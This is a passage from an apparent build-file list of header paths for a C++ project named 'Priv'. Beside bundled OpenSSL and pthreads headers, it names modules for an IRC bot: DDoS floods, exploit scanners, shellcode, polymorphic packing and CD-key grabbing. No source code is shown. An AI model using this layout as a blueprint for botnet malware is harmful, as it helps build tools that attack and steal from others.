    cpp/Priv/Priv/lib/openssl/linux/include/openssl/pkcs12.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/pkcs7.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/rand.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/rc2.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/rc4.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/rc5.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ripemd.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/rsa.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/safestack.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/sha.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ssl.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ssl2.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ssl23.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ssl3.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/stack.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/symhacks.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/tls1.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/tmdiff.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/txt_db.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ui.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/ui_compat.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/x509.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/x509_vfy.h \
    cpp/Priv/Priv/lib/openssl/linux/include/openssl/x509v3.h \
    cpp/Priv/Priv/lib/pthreads/win32/implement.h \
    cpp/Priv/Priv/lib/pthreads/win32/need_errno.h \
    cpp/Priv/Priv/lib/pthreads/win32/pthread.h \
    cpp/Priv/Priv/lib/pthreads/win32/sched.h \
    cpp/Priv/Priv/lib/pthreads/win32/semaphore.h \
    cpp/Priv/Priv/rsa/des.h \
    cpp/Priv/Priv/rsa/digit.h \
    cpp/Priv/Priv/rsa/global.h \
    cpp/Priv/Priv/rsa/md2.h \
    cpp/Priv/Priv/rsa/md5.h \
    cpp/Priv/Priv/rsa/nn.h \
    cpp/Priv/Priv/rsa/prime.h \
    cpp/Priv/Priv/rsa/r_random.h \
    cpp/Priv/Priv/rsa/rsa.h \
    cpp/Priv/Priv/rsa/rsaref.h \
    cpp/Priv/Priv/bot.h \
    cpp/Priv/Priv/cdkeygrab.h \
    cpp/Priv/Priv/cmdbase.h \
    cpp/Priv/Priv/cmdline.h \
    cpp/Priv/Priv/cmdopt.h \
    cpp/Priv/Priv/commands.h \
    cpp/Priv/Priv/consdbg.h \
    cpp/Priv/Priv/crypter.h \
    cpp/Priv/Priv/cstring.h \
    cpp/Priv/Priv/cthread.h \
    cpp/Priv/Priv/cvar.h \
    cpp/Priv/Priv/dcom2scanner.h \
    cpp/Priv/Priv/dcomscanner.h \
    cpp/Priv/Priv/ddos.h \
    cpp/Priv/Priv/httpflood.h \
    cpp/Priv/Priv/installer.h \
    cpp/Priv/Priv/irc.h \
    cpp/Priv/Priv/ircgate.h \
    cpp/Priv/Priv/junoflood.h \
    cpp/Priv/Priv/locscanner.h \
    cpp/Priv/Priv/mac.h \
    cpp/Priv/Priv/main.h \
    cpp/Priv/Priv/mainctrl.h \
    cpp/Priv/Priv/message.h \
    cpp/Priv/Priv/nbscanner.h \
    cpp/Priv/Priv/p2p.h \
    cpp/Priv/Priv/pingflood.h \
    cpp/Priv/Priv/polymorph.h \
    cpp/Priv/Priv/random.h \
    cpp/Priv/Priv/redir_gre.h \
    cpp/Priv/Priv/redir_http.h \
    cpp/Priv/Priv/redir_socks.h \
    cpp/Priv/Priv/redir_tcp.h \
    cpp/Priv/Priv/redirect.h \
    cpp/Priv/Priv/resource.h \
    cpp/Priv/Priv/rsalib.h \
    cpp/Priv/Priv/scanner.h \
    cpp/Priv/Priv/sdcompat.h \
    cpp/Priv/Priv/shellcode.h \
    cpp/Priv/Priv/ssllib.h \
    cpp/Priv/Priv/synflood.h \
    cpp/Priv/Priv/udpflood.h \
    cpp/Priv/Priv/utility.h \
    cpp/Priv/Priv/wdscanner.h
